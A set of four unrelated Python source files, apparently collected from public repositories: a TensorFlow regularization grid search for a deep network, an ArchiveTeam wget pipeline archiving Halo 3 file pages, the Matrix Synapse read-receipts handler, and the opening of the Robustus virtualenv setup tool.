# # learning_rate = tf.train.exponential_decay(0.5, global_step, decay_rate=0.96, decay_steps=num_steps/(np.log(0.1/0.5)/np.log(0.96)))
# learning_rate = 0.5
# weights1 = tf.Variable(tf.truncated_normal([image_size**2, h1_length]))
# biases1 = tf.Variable(tf.zeros([h1_length]))
#
#             # Dropout: the mini-batch size cannot be too small.
#             # We could substitute a sigmoid for the softmax if the loss becomes NaN.
# # logits1 = tf.nn.relu(tf.matmul(tf_train_dataset, weights1) + biases1)
# logits1 = tf.nn.dropout(x=tf.nn.relu(tf.matmul(tf_train_dataset, weights1) + biases1), keep_prob=keep_prob)
#
# weights2 = tf.Variable(tf.truncated_normal([h1_length, num_labels]))
# biases2 = tf.Variable(tf.zeros([num_labels]))
#
# # logits2 = tf.nn.relu(tf.matmul(logits1, weights2) + biases2)
# logits2 = tf.matmul(logits1, weights2) + biases2
# loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits2, tf_train_labels)
# + regular_lambda1*tf.nn.l2_loss(weights1)
# + regular_lambda2*tf.nn.l2_loss(weights2))
#
# # optimizer = tf.train.GradientDescentOptimizer(0.5).minimize(loss)
# optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss,global_step=global_step)
#
# train_prediction = tf.nn.softmax(logits2)
# valid_prediction = tf.nn.softmax(tf.matmul(tf.nn.relu(tf.matmul(tf_valid_dataset, weights1) + biases1)
# , weights2) + biases2)
# test_prediction = tf.nn.softmax(tf.matmul(tf.nn.relu(tf.matmul(tf_test_dataset, weights1) + biases1)
# , weights2) + biases2)
#
#
# def accuracy(predictions, labels):
# return 100.0 * np.sum(np.argmax(predictions, 1) == np.argmax(labels, 1)) / predictions.shape[0]
#
#
#
# with tf.Session(graph=graph) as session:
# tf.global_variables_initializer().run()
# for step in range(num_steps):
# offset = batch_size*step % (train_labels.shape[0]-batch_size)
# batch_data = train_dataset[offset:(offset+batch_size),:]
# batch_labels = train_labels[offset:(offset+batch_size),:]
# feed_dict = {tf_train_dataset: batch_data, tf_train_labels: batch_labels, keep_prob: 1}
# # feed_dict = {tf_train_dataset: batch_data, tf_train_labels: batch_labels, keep_prob: 0.5}
# _, l, predictions = session.run([optimizer, loss, train_prediction], feed_dict=feed_dict)
# if step % 500 == 0:
# print("Minibatch loss at step %d: %f" % (step, l))
# print("Minibatch accuracy: %.1f%%" % accuracy(predictions, batch_labels))
# print("Validation accuracy: %.1f%%" % accuracy(
# valid_prediction.eval(), valid_labels))
# print('Testing accuracy: %.1f%%' % accuracy(test_prediction.eval(), test_labels))
# deep learning
# best_hypers
# '95.29': (0.001, 0.001, 0.0003, 0.0003, 0.001, 0.0003)
grid_lambda = np.array([[0.001],
[0.001],
[0.0003],
[0.0003],
[0.001],
[0.0003]
])
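# Each row of grid_lambda holds the candidate L2 coefficients for the corresponding
# weight matrix (weights1..weights6); with a single value per row the nested loops
# below evaluate only the one combination listed as best above.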
# batch_size = 50 # test for dropout
# batch_size = 128
# batch_size = 50
batch_size = 256
h1_length = 1024
h2_length = h1_length//3
h3_length = h2_length//3
h4_length = h3_length//3
h5_length = h4_length//3
num_steps = 3001
best_hyper = {}
for regular_lambda1 in grid_lambda[0]:
for regular_lambda2 in grid_lambda[1]:
for regular_lambda3 in grid_lambda[2]:
for regular_lambda4 in grid_lambda[3]:
for regular_lambda5 in grid_lambda[4]:
for regular_lambda6 in grid_lambda[5]:
print('\nregularization coefficient:(%f, %f, %f, %f, %f, %f)' % (regular_lambda1, regular_lambda2, regular_lambda3, regular_lambda4, regular_lambda5, regular_lambda6))
graph = tf.Graph()
with graph.as_default():
keep_prob = tf.placeholder(dtype=tf.float32, shape=())
tf_train_dataset = tf.placeholder(dtype=tf.float32, shape=(batch_size, image_size**2))
tf_train_labels = tf.placeholder(dtype=tf.float32, shape=(batch_size, num_labels))
tf_valid_dataset = tf.constant(valid_dataset)
tf_test_dataset = tf.constant(test_dataset)
global_step = tf.Variable(0) # count the number of steps taken.
initial_learning_rate = 0.5
final_learning_rate = 0.01
decay_rate = 0.96
learning_rate = tf.train.exponential_decay(initial_learning_rate, global_step, decay_rate=decay_rate, decay_steps=num_steps/(np.log(final_learning_rate/initial_learning_rate)/np.log(decay_rate)))
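                            # exponential_decay yields lr = initial * decay_rate**(global_step / decay_steps);
                            # choosing decay_steps = num_steps / (log(final/initial) / log(decay_rate)) makes the
                            # schedule reach final_learning_rate after num_steps steps.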
# learning_rate = 0.5
# weights1 = tf.Variable(tf.truncated_normal([image_size**2, h1_length]))
weights1 = tf.get_variable('weights1', [image_size**2, h1_length], initializer=tf.contrib.layers.xavier_initializer())
biases1 = tf.Variable(tf.zeros([h1_length]))
logits1 = tf.nn.dropout(x=tf.nn.relu(tf.matmul(tf_train_dataset, weights1) + biases1), keep_prob=keep_prob)
weights2 = tf.get_variable('weights2', [h1_length, h2_length], initializer=tf.contrib.layers.xavier_initializer())
biases2 = tf.Variable(tf.zeros([h2_length]))
logits2 = tf.nn.dropout(x=tf.nn.relu(tf.matmul(logits1, weights2) + biases2), keep_prob=keep_prob)
weights3 = tf.get_variable('weights3', [h2_length, h3_length], initializer=tf.contrib.layers.xavier_initializer())
biases3 = tf.Variable(tf.zeros([h3_length]))
logits3 = tf.nn.dropout(x=tf.nn.relu(tf.matmul(logits2, weights3) + biases3), keep_prob=keep_prob)
weights4 = tf.get_variable('weights4', [h3_length, h4_length], initializer=tf.contrib.layers.xavier_initializer())
biases4 = tf.Variable(tf.zeros([h4_length]))
logits4 = tf.nn.dropout(x=tf.nn.relu(tf.matmul(logits3, weights4) + biases4), keep_prob=keep_prob)
weights5 = tf.get_variable('weights5', [h4_length, h5_length], initializer=tf.contrib.layers.xavier_initializer())
biases5 = tf.Variable(tf.zeros([h5_length]))
logits5 = tf.nn.dropout(x=tf.nn.relu(tf.matmul(logits4, weights5) + biases5), keep_prob=keep_prob)
weights6 = tf.get_variable('weights6', [h5_length, num_labels], initializer=tf.contrib.layers.xavier_initializer())
biases6 = tf.Variable(tf.zeros([num_labels]))
logits6 = tf.matmul(logits5, weights6) + biases6
loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits6, tf_train_labels)
+ regular_lambda1*tf.nn.l2_loss(weights1)
+ regular_lambda2*tf.nn.l2_loss(weights2)
+ regular_lambda3*tf.nn.l2_loss(weights3)
+ regular_lambda4*tf.nn.l2_loss(weights4)
+ regular_lambda5 * tf.nn.l2_loss(weights5)
+ regular_lambda6 * tf.nn.l2_loss(weights6))
optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss,global_step=global_step)
train_prediction = tf.nn.softmax(logits6)
valid_prediction = tf.nn.softmax(
tf.matmul(
tf.nn.relu(tf.matmul(
tf.nn.relu(tf.matmul(
tf.nn.relu(tf.matmul(
tf.nn.relu(tf.matmul(
tf.nn.relu(tf.matmul(tf_valid_dataset, weights1) + biases1)
, weights2) + biases2)
, weights3) + biases3)
, weights4) + biases4)
, weights5) + biases5)
, weights6) + biases6
)
test_prediction = tf.nn.softmax(
tf.matmul(
tf.nn.relu(tf.matmul(
tf.nn.relu(tf.matmul(
tf.nn.relu(tf.matmul(
tf.nn.relu(tf.matmul(
tf.nn.relu(tf.matmul(tf_test_dataset, weights1) + biases1)
, weights2) + biases2)
, weights3) + biases3)
, weights4) + biases4)
, weights5) + biases5)
, weights6) + biases6
)
def accuracy(predictions, labels):
return 100.0 * np.sum(np.argmax(predictions, 1) == np.argmax(labels, 1)) / predictions.shape[0]
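                        # argmax along axis 1 turns both the softmax outputs and the one-hot labels
                        # into class indices; the fraction of matches, times 100, is the accuracy in percent.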
with tf.Session(graph=graph) as session:
tf.global_variables_initializer().run()
for step in range(num_steps):
offset = batch_size*step % (train_labels.shape[0]-batch_size)
batch_data = train_dataset[offset:(offset+batch_size),:]
batch_labels = train_labels[offset:(offset+batch_size),:]
feed_dict = {tf_train_dataset: batch_data, tf_train_labels: batch_labels, keep_prob: 1}
# feed_dict = {tf_train_dataset: batch_data, tf_train_labels: batch_labels, keep_prob: 0.5}
_, l, predictions = session.run([optimizer, loss, train_prediction], feed_dict=feed_dict)
if step % 500 == 0:
print("Minibatch loss at step %d: %f" % (step, l))
print("Minibatch accuracy: %.1f%%" % accuracy(predictions, batch_labels))
print("Validation accuracy: %.1f%%" % accuracy(
valid_prediction.eval(), valid_labels))
testing_accuracy = accuracy(test_prediction.eval(), test_labels)
print('Testing accuracy: %.1f%%' % accuracy(test_prediction.eval(), test_labels))
best_hyper[str(testing_accuracy)] = (regular_lambda1, regular_lambda2, regular_lambda3, regular_lambda4, regular_lambda5, regular_lambda6)
print('\nresults:\n', best_hyper)
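# A minimal sketch of how the repeated relu/matmul chains used above for the validation
# and test predictions could be factored into a helper; the name `forward` and the
# explicit weights/biases lists are illustrative only (assumes tensorflow imported as tf).
def forward(x, weights, biases):
    # Apply relu(x @ W + b) for every hidden layer, then the final affine layer.
    for w, b in zip(weights[:-1], biases[:-1]):
        x = tf.nn.relu(tf.matmul(x, w) + b)
    return tf.matmul(x, weights[-1]) + biases[-1]
# e.g. valid_prediction = tf.nn.softmax(forward(tf_valid_dataset,
#     [weights1, weights2, weights3, weights4, weights5, weights6],
#     [biases1, biases2, biases3, biases4, biases5, biases6]))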
|
|
# encoding=utf8
import datetime
from distutils.version import StrictVersion
import hashlib
import os.path
import random
from seesaw.config import realize, NumberConfigValue
from seesaw.item import ItemInterpolation, ItemValue
from seesaw.task import SimpleTask, LimitConcurrent
from seesaw.tracker import GetItemFromTracker, PrepareStatsForTracker, \
UploadWithTracker, SendDoneToTracker
import shutil
import socket
import subprocess
import sys
import time
import string
import seesaw
from seesaw.externalprocess import WgetDownload
from seesaw.pipeline import Pipeline
from seesaw.project import Project
from seesaw.util import find_executable
# check the seesaw version
if StrictVersion(seesaw.__version__) < StrictVersion("0.1.5"):
raise Exception("This pipeline needs seesaw version 0.1.5 or higher.")
###########################################################################
# Find a useful Wget+Lua executable.
#
# WGET_LUA will be set to the first path that
# 1. does not crash with --version, and
# 2. prints the required version string
WGET_LUA = find_executable(
"Wget+Lua",
["GNU Wget 1.14.lua.20130523-9a5c"],
[
"./wget-lua",
"./wget-lua-warrior",
"./wget-lua-local",
"../wget-lua",
"../../wget-lua",
"/home/warrior/wget-lua",
"/usr/bin/wget-lua"
]
)
if not WGET_LUA:
raise Exception("No usable Wget+Lua found.")
###########################################################################
# The version number of this pipeline definition.
#
# Update this each time you make a non-cosmetic change.
# It will be added to the WARC files and reported to the tracker.
VERSION = "20141106.05"
USER_AGENT = 'ArchiveTeam'
TRACKER_ID = 'halo'
TRACKER_HOST = 'tracker.archiveteam.org'
###########################################################################
# This section defines project-specific tasks.
#
# Simple tasks (tasks that do not need any concurrency) are based on the
# SimpleTask class and have a process(item) method that is called for
# each item.
class CheckIP(SimpleTask):
def __init__(self):
SimpleTask.__init__(self, "CheckIP")
self._counter = 0
def process(self, item):
# NEW for 2014! Check if we are behind firewall/proxy
if self._counter <= 0:
item.log_output('Checking IP address.')
ip_set = set()
ip_set.add(socket.gethostbyname('twitter.com'))
ip_set.add(socket.gethostbyname('facebook.com'))
ip_set.add(socket.gethostbyname('youtube.com'))
ip_set.add(socket.gethostbyname('microsoft.com'))
ip_set.add(socket.gethostbyname('icanhas.cheezburger.com'))
ip_set.add(socket.gethostbyname('archiveteam.org'))
if len(ip_set) != 6:
item.log_output('Got IP addresses: {0}'.format(ip_set))
item.log_output(
'Are you behind a firewall/proxy? That is a big no-no!')
raise Exception(
'Are you behind a firewall/proxy? That is a big no-no!')
# Check only occasionally
if self._counter <= 0:
self._counter = 10
else:
self._counter -= 1
class PrepareDirectories(SimpleTask):
def __init__(self, warc_prefix):
SimpleTask.__init__(self, "PrepareDirectories")
self.warc_prefix = warc_prefix
def process(self, item):
item_name = item["item_name"]
escaped_item_name = item_name.replace(':', '_').replace('/', '_').replace('~', '_')
dirname = "/".join((item["data_dir"], escaped_item_name))
if os.path.isdir(dirname):
shutil.rmtree(dirname)
os.makedirs(dirname)
item["item_dir"] = dirname
item["warc_file_base"] = "%s-%s-%s" % (self.warc_prefix, escaped_item_name,
time.strftime("%Y%m%d-%H%M%S"))
open("%(item_dir)s/%(warc_file_base)s.warc.gz" % item, "w").close()
class MoveFiles(SimpleTask):
def __init__(self):
SimpleTask.__init__(self, "MoveFiles")
def process(self, item):
# NEW for 2014! Check if wget was compiled with zlib support
if os.path.exists("%(item_dir)s/%(warc_file_base)s.warc" % item):
raise Exception('Please compile wget with zlib support!')
os.rename("%(item_dir)s/%(warc_file_base)s.warc.gz" % item,
"%(data_dir)s/%(warc_file_base)s.warc.gz" % item)
shutil.rmtree("%(item_dir)s" % item)
def get_hash(filename):
with open(filename, 'rb') as in_file:
return hashlib.sha1(in_file.read()).hexdigest()
CWD = os.getcwd()
PIPELINE_SHA1 = get_hash(os.path.join(CWD, 'pipeline.py'))
LUA_SHA1 = get_hash(os.path.join(CWD, 'halo.lua'))
def stats_id_function(item):
# NEW for 2014! Some accountability hashes and stats.
d = {
'pipeline_hash': PIPELINE_SHA1,
'lua_hash': LUA_SHA1,
'python_version': sys.version,
}
return d
class WgetArgs(object):
def realize(self, item):
wget_args = [
WGET_LUA,
"-U", USER_AGENT,
"-nv",
"--lua-script", "halo.lua",
"-o", ItemInterpolation("%(item_dir)s/wget.log"),
"--no-check-certificate",
"--output-document", ItemInterpolation("%(item_dir)s/wget.tmp"),
"--truncate-output",
"-e", "robots=off",
"--rotate-dns",
"--recursive", "--level=inf",
"--no-parent",
"--page-requisites",
"--timeout", "30",
"--tries", "inf",
"--domains", "halo.bungie.net",
"--span-hosts",
"--waitretry", "30",
"--warc-file", ItemInterpolation("%(item_dir)s/%(warc_file_base)s"),
"--warc-header", "operator: Archive Team",
"--warc-header", "halo-dld-script-version: " + VERSION,
"--warc-header", ItemInterpolation("halo-user: %(item_name)s"),
]
item_name = item['item_name']
assert ':' in item_name
item_type, item_value = item_name.split(':', 1)
item['item_type'] = item_type
item['item_value'] = item_value
        assert item_type in ("halo3file",)
if item_type == 'halo3file':
suffixesa = string.digits
suffixesb = string.digits
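            # Two extra digits are appended to the base file id, so each item expands to 100
            # candidate pages, e.g. item_value '12345' covers h3fileid=1234500 through 1234599.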
for url in ['http://halo.bungie.net/Online/Halo3UserContentDetails.aspx?h3fileid={0}{1}{2}'.format(item_value, a, b) for a in suffixesa for b in suffixesb]:
wget_args.append(url)
else:
raise Exception('Unknown item')
if 'bind_address' in globals():
wget_args.extend(['--bind-address', globals()['bind_address']])
print('')
            print('*** Wget will bind to address {0} ***'.format(
globals()['bind_address']))
print('')
return realize(wget_args, item)
###########################################################################
# Initialize the project.
#
# This will be shown in the warrior management panel. The logo should not
# be too big. The deadline is optional.
project = Project(
title="halo",
project_html="""
<img class="project-logo" alt="Project logo" src="http://gamerfreunde.net/wp-content/uploads/2014/02/NewHaloLogo.png" height="50px" title=""/>
<h2>halo.bungie.net <span class="links"><a href="http://halo.bungie.net/">Website</a> · <a href="http://tracker.archiveteam.org/halo/">Leaderboard</a></span></h2>
<p>Archiving old stats and other data from Halo.</p>
"""
)
pipeline = Pipeline(
CheckIP(),
GetItemFromTracker("http://%s/%s" % (TRACKER_HOST, TRACKER_ID), downloader,
VERSION),
PrepareDirectories(warc_prefix="halo"),
WgetDownload(
WgetArgs(),
max_tries=2,
accept_on_exit_code=[0, 8],
env={
"item_dir": ItemValue("item_dir"),
"item_value": ItemValue("item_value"),
"item_type": ItemValue("item_type"),
}
),
PrepareStatsForTracker(
defaults={"downloader": downloader, "version": VERSION},
file_groups={
"data": [
ItemInterpolation("%(item_dir)s/%(warc_file_base)s.warc.gz")
]
},
id_function=stats_id_function,
),
MoveFiles(),
LimitConcurrent(NumberConfigValue(min=1, max=4, default="1",
name="shared:rsync_threads", title="Rsync threads",
description="The maximum number of concurrent uploads."),
UploadWithTracker(
"http://%s/%s" % (TRACKER_HOST, TRACKER_ID),
downloader=downloader,
version=VERSION,
files=[
ItemInterpolation("%(data_dir)s/%(warc_file_base)s.warc.gz")
],
rsync_target_source_path=ItemInterpolation("%(data_dir)s/"),
rsync_extra_args=[
"--recursive",
"--partial",
"--partial-dir", ".rsync-tmp",
]
),
),
SendDoneToTracker(
tracker_url="http://%s/%s" % (TRACKER_HOST, TRACKER_ID),
stats=ItemValue("stats")
)
)
|
|
# Copyright 2015, 2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import TYPE_CHECKING, Iterable, List, Optional, Tuple
from synapse.api.constants import ReadReceiptEventFields, ReceiptTypes
from synapse.appservice import ApplicationService
from synapse.streams import EventSource
from synapse.types import JsonDict, ReadReceipt, UserID, get_domain_from_id
if TYPE_CHECKING:
from synapse.server import HomeServer
logger = logging.getLogger(__name__)
class ReceiptsHandler:
def __init__(self, hs: "HomeServer"):
self.notifier = hs.get_notifier()
self.server_name = hs.config.server.server_name
self.store = hs.get_datastores().main
self.event_auth_handler = hs.get_event_auth_handler()
self.hs = hs
        # We only need to poke the federation sender explicitly if it's on the
# same instance. Other federation sender instances will get notified by
# `synapse.app.generic_worker.FederationSenderHandler` when it sees it
# in the receipts stream.
self.federation_sender = None
if hs.should_send_federation():
self.federation_sender = hs.get_federation_sender()
# If we can handle the receipt EDUs we do so, otherwise we route them
# to the appropriate worker.
if hs.get_instance_name() in hs.config.worker.writers.receipts:
hs.get_federation_registry().register_edu_handler(
"m.receipt", self._received_remote_receipt
)
else:
hs.get_federation_registry().register_instances_for_edu(
"m.receipt",
hs.config.worker.writers.receipts,
)
self.clock = self.hs.get_clock()
self.state = hs.get_state_handler()
async def _received_remote_receipt(self, origin: str, content: JsonDict) -> None:
"""Called when we receive an EDU of type m.receipt from a remote HS."""
receipts = []
for room_id, room_values in content.items():
# If we're not in the room just ditch the event entirely. This is
# probably an old server that has come back and thinks we're still in
# the room (or we've been rejoined to the room by a state reset).
is_in_room = await self.event_auth_handler.check_host_in_room(
room_id, self.server_name
)
if not is_in_room:
logger.info(
"Ignoring receipt for room %r from server %s as we're not in the room",
room_id,
origin,
)
continue
for receipt_type, users in room_values.items():
for user_id, user_values in users.items():
if get_domain_from_id(user_id) != origin:
logger.info(
"Received receipt for user %r from server %s, ignoring",
user_id,
origin,
)
continue
receipts.append(
ReadReceipt(
room_id=room_id,
receipt_type=receipt_type,
user_id=user_id,
event_ids=user_values["event_ids"],
data=user_values.get("data", {}),
)
)
await self._handle_new_receipts(receipts)
async def _handle_new_receipts(self, receipts: List[ReadReceipt]) -> bool:
"""Takes a list of receipts, stores them and informs the notifier."""
min_batch_id: Optional[int] = None
max_batch_id: Optional[int] = None
for receipt in receipts:
res = await self.store.insert_receipt(
receipt.room_id,
receipt.receipt_type,
receipt.user_id,
receipt.event_ids,
receipt.data,
)
if not res:
# res will be None if this read receipt is 'old'
continue
stream_id, max_persisted_id = res
if min_batch_id is None or stream_id < min_batch_id:
min_batch_id = stream_id
if max_batch_id is None or max_persisted_id > max_batch_id:
max_batch_id = max_persisted_id
# Either both of these should be None or neither.
if min_batch_id is None or max_batch_id is None:
# no new receipts
return False
affected_room_ids = list({r.room_id for r in receipts})
self.notifier.on_new_event("receipt_key", max_batch_id, rooms=affected_room_ids)
# Note that the min here shouldn't be relied upon to be accurate.
await self.hs.get_pusherpool().on_new_receipts(
min_batch_id, max_batch_id, affected_room_ids
)
return True
async def received_client_receipt(
self, room_id: str, receipt_type: str, user_id: str, event_id: str, hidden: bool
) -> None:
"""Called when a client tells us a local user has read up to the given
event_id in the room.
"""
receipt = ReadReceipt(
room_id=room_id,
receipt_type=receipt_type,
user_id=user_id,
event_ids=[event_id],
data={"ts": int(self.clock.time_msec()), "hidden": hidden},
)
is_new = await self._handle_new_receipts([receipt])
if not is_new:
return
if self.federation_sender and not (
self.hs.config.experimental.msc2285_enabled and hidden
):
await self.federation_sender.send_read_receipt(receipt)
class ReceiptEventSource(EventSource[int, JsonDict]):
def __init__(self, hs: "HomeServer"):
self.store = hs.get_datastores().main
self.config = hs.config
@staticmethod
def filter_out_hidden(events: List[JsonDict], user_id: str) -> List[JsonDict]:
visible_events = []
# filter out hidden receipts the user shouldn't see
for event in events:
content = event.get("content", {})
new_event = event.copy()
new_event["content"] = {}
for event_id in content.keys():
event_content = content.get(event_id, {})
m_read = event_content.get(ReceiptTypes.READ, {})
# If m_read is missing copy over the original event_content as there is nothing to process here
if not m_read:
new_event["content"][event_id] = event_content.copy()
continue
new_users = {}
for rr_user_id, user_rr in m_read.items():
try:
hidden = user_rr.get("hidden")
except AttributeError:
# Due to https://github.com/matrix-org/synapse/issues/10376
# there are cases where user_rr is a string, in those cases
# we just ignore the read receipt
continue
if hidden is not True or rr_user_id == user_id:
new_users[rr_user_id] = user_rr.copy()
# If hidden has a value replace hidden with the correct prefixed key
if hidden is not None:
new_users[rr_user_id].pop("hidden")
new_users[rr_user_id][
ReadReceiptEventFields.MSC2285_HIDDEN
] = hidden
# Set new users unless empty
if len(new_users.keys()) > 0:
new_event["content"][event_id] = {ReceiptTypes.READ: new_users}
# Append new_event to visible_events unless empty
if len(new_event["content"].keys()) > 0:
visible_events.append(new_event)
return visible_events
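    # Example of the shapes involved (hypothetical user/event ids): for
    #   events = [{"content": {"$evt": {ReceiptTypes.READ: {
    #       "@alice:hs": {"ts": 1, "hidden": True}, "@bob:hs": {"ts": 2}}}}}]
    # filter_out_hidden(events, "@bob:hs") drops @alice's hidden receipt, while
    # filter_out_hidden(events, "@alice:hs") keeps it and renames "hidden" to
    # ReadReceiptEventFields.MSC2285_HIDDEN.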
async def get_new_events(
self,
user: UserID,
from_key: int,
limit: Optional[int],
room_ids: Iterable[str],
is_guest: bool,
explicit_room_id: Optional[str] = None,
) -> Tuple[List[JsonDict], int]:
from_key = int(from_key)
to_key = self.get_current_key()
if from_key == to_key:
return [], to_key
events = await self.store.get_linearized_receipts_for_rooms(
room_ids, from_key=from_key, to_key=to_key
)
if self.config.experimental.msc2285_enabled:
events = ReceiptEventSource.filter_out_hidden(events, user.to_string())
return events, to_key
async def get_new_events_as(
self, from_key: int, service: ApplicationService
) -> Tuple[List[JsonDict], int]:
"""Returns a set of new read receipt events that an appservice
may be interested in.
Args:
from_key: the stream position at which events should be fetched from
service: The appservice which may be interested
Returns:
A two-tuple containing the following:
* A list of json dictionaries derived from read receipts that the
appservice may be interested in.
* The current read receipt stream token.
"""
from_key = int(from_key)
to_key = self.get_current_key()
if from_key == to_key:
return [], to_key
# Fetch all read receipts for all rooms, up to a limit of 100. This is ordered
# by most recent.
rooms_to_events = await self.store.get_linearized_receipts_for_all_rooms(
from_key=from_key, to_key=to_key
)
# Then filter down to rooms that the AS can read
events = []
for room_id, event in rooms_to_events.items():
if not await service.is_interested_in_room(room_id, self.store):
continue
events.append(event)
return events, to_key
def get_current_key(self, direction: str = "f") -> int:
return self.store.get_max_receipt_stream_id()
|
|
# =============================================================================
# COPYRIGHT 2013-14 Brain Corporation.
# License under MIT license (see LICENSE file)
# =============================================================================
import argparse
import collections
import distutils.core
import fnmatch
import glob
import importlib
import logging
import multiprocessing
import os
import platform
import shutil
import subprocess
import sys
import tempfile
from detail import Requirement, RequirementException, read_requirement_file
from detail.requirement import remove_duplicate_requirements, expand_requirements_specifiers, generate_dependency_list
from detail.utility import ln, run_shell, download, safe_remove, unpack, get_single_char
import urllib2
# for doctests
import detail
import re
__version__ = '0.0.2'
class RobustusException(Exception):
def __init__(self, message):
Exception.__init__(self, message)
class Robustus(object):
settings_file_path = '.robustus'
cached_requirements_file_path = 'cached_requirements.txt'
default_settings = {
'cache': 'wheelhouse'
}
    # FIXME: not so great to hardcode the braincorp address here, but otherwise
    # we would need to modify the use_repo.sh of the other repositories that use robustus
default_package_locations = ['http://thirdparty-packages.braincorporation.net']
def __init__(self, args):
"""
Initialize robustus tool. Should be called if sys.executable is in robustus environment
@param: args - command line arguments
"""
if args.env is not None:
self.env = os.path.abspath(args.env)
else:
self.env = os.path.abspath(os.path.join(sys.executable, os.pardir, os.pardir))
# check if we are in robustus environment
self.settings_file_path = os.path.join(self.env, Robustus.settings_file_path)
if not os.path.isfile(self.settings_file_path):
raise RobustusException('bad robustus environment ' + self.env + ': .robustus settings file not found')
settings = eval(open(self.settings_file_path).read())
self.settings = Robustus._override_settings(settings, args)
if 'find_links' not in self.settings:
self.settings['find_links'] = self.default_package_locations
logging.info('Robustus will use the following cache folder: %s' % self.settings['cache'])
self.python_executable = os.path.join(self.env, 'bin/python')
if not os.path.isfile(self.python_executable):
self.python_executable = os.path.join(self.env, 'bin/python27')
if not os.path.isfile(self.python_executable):
raise RobustusException('bad robustus environment ' + self.env + ': python not found')
self.pip_executable = os.path.join(self.env, 'bin/pip')
if not os.path.isfile(self.pip_executable):
raise RobustusException('bad robustus environment ' + self.env + ': pip not found')
self.easy_install_executable = os.path.join(self.env, 'bin/easy_install')
if not os.path.isfile(self.easy_install_executable):
raise RobustusException('bad robustus environment ' + self.env + ': easy_install not found')
# make cached packages directory if necessary
self.cache = os.path.join(self.env, self.settings['cache'])
if not os.path.isdir(self.cache):
os.mkdir(self.cache)
# remove bad formatted rob files with '.' in version instead of '_'
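        # (cached requirements are stored as '<name>__<version>.rob', e.g. 'numpy__1_8_0.rob')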
for rob_file in glob.iglob('%s/*.rob' % self.cache):
rob_basename = os.path.basename(rob_file)
if rob_basename.find('__') != -1:
name, version = rob_basename[:-4].split('__')
if '.' in version:
corrected_filename = os.path.join(self.cache,
'%s__%s.rob' % (name, version.replace('.', '_')))
logging.info('Corrected rob file version from %s to %s' % (rob_file, corrected_filename))
shutil.copy(rob_file, corrected_filename)
os.remove(rob_file)
# read cached packages
self.cached_packages = []
for rob_file in glob.iglob('%s/*.rob' % self.cache):
self.cached_packages.append(Requirement(rob_filename=rob_file))
@staticmethod
def _override_settings(settings, args):
# override settings with command line arguments
if args.cache is not None:
settings['cache'] = args.cache
settings['verbosity'] = args.verbosity
settings['debug'] = args.debug
# Set logging volume for debugging
if settings['debug']:
logging.getLogger('').setLevel(logging.DEBUG)
return settings
@staticmethod
def env(args):
"""
Create robustus environment.
@param args: command line arguments
"""
settings = dict()
settings = Robustus._override_settings(settings, args)
# create virtualenv
python_executable = os.path.abspath(os.path.join(args.env, 'bin/python'))
if os.path.isfile(python_executable):
logging.info('Found virtualenv in ' + args.env)
else:
logging.info('Creating virtualenv')
virtualenv_args = ['virtualenv', args.env, '--prompt', args.prompt]
if args.python is not None:
virtualenv_args += ['--python', args.python]
if args.system_site_packages:
virtualenv_args += ['--system-site-packages']
run_shell(virtualenv_args, settings['verbosity'] >= 1)
pip_executable = os.path.abspath(os.path.join(args.env, 'bin/pip'))
if not os.path.isfile(pip_executable):
raise RobustusException('failed to create virtualenv, pip not found')
easy_install_executable = os.path.abspath(os.path.join(args.env, 'bin/easy_install'))
if not os.path.isfile(easy_install_executable):
raise RobustusException('failed to create virtualenv, easy_install not found')
        # http://wheel.readthedocs.org/en/latest/
        # wheel is the binary package format for python/pip.
        # We store all packages as binary wheels on disk to avoid recompiling them.
        # Building wheels needs pip>=1.4, setuptools>=0.8 and the wheel package.
run_shell([pip_executable, 'install', 'pip==6.1.1', '--upgrade'], settings['verbosity'] >= 1)
run_shell([pip_executable, 'install', 'wheel==0.24.0', '--upgrade'], settings['verbosity'] >= 1)
# some sloppy maintained packages (like ROS) require outdated distribute for installation
# and we need to install it before setuptools. For those there used to be the following lines here:
# run_shell([pip_executable, 'install', 'distribute==0.7.3'], settings['verbosity'] >= 1)
# run_shell([pip_executable, 'install', 'setuptools==1.1.6', '--upgrade'], settings['verbosity'] >= 1)
# that are gone now, but please consider uncommenting those if new problems with ROS appear.
        # Currently we upgrade setuptools to a modern version:
run_shell([pip_executable, 'install', 'setuptools==15.2', '--upgrade'], settings['verbosity'] >= 1)
# linking BLAS and LAPACK libraries
if os.path.isfile('/usr/lib64/libblas.so.3'):
logging.info('Linking CentOS libblas to venv')
blas_so = os.path.join(args.env, 'lib64/libblas.so')
ln('/usr/lib64/libblas.so.3', blas_so, True)
os.environ['BLAS'] = os.path.join(args.env, 'lib64')
elif os.path.isfile('/usr/lib/libblas.so'):
logging.info('Linking Ubuntu libblas to venv')
blas_so = os.path.join(args.env, 'lib/libblas.so')
ln('/usr/lib/libblas.so', blas_so, True)
os.environ['BLAS'] = os.path.join(args.env, 'lib')
if os.path.isfile('/usr/lib64/liblapack.so.3'):
logging.info('Linking CentOS liblapack to venv')
lapack_so = os.path.join(args.env, 'lib64/liblapack.so')
ln('/usr/lib64/liblapack.so.3', lapack_so, True)
os.environ['LAPACK'] = os.path.join(args.env, 'lib64')
elif os.path.isfile('/usr/lib/liblapack.so'):
logging.info('Linking Ubuntu liblapack to venv')
lapack_so = os.path.join(args.env, 'lib/liblapack.so')
ln('/usr/lib/liblapack.so', lapack_so, True)
os.environ['LAPACK'] = os.path.join(args.env, 'lib')
if sys.platform.startswith('darwin'):
# on Mac, install readline before everything else
# Ubuntu already has readline in the system python library
run_shell([easy_install_executable, '-q', 'readline==6.2.2'], settings['verbosity'] >= 1)
# compose settings file
logging.info('Write .robustus config file')
settings = Robustus._override_settings(Robustus.default_settings, args)
with open(os.path.join(args.env, Robustus.settings_file_path), 'w') as file:
file.write(str(settings))
# Install Robustus in the Python virtual environment if its "setup.py" is available.
# If Robustus has already been installed in the virtual environment, running "setup.py"
# should be harmless. This is required to pass the "test_robustus" test.
cwd = os.getcwd()
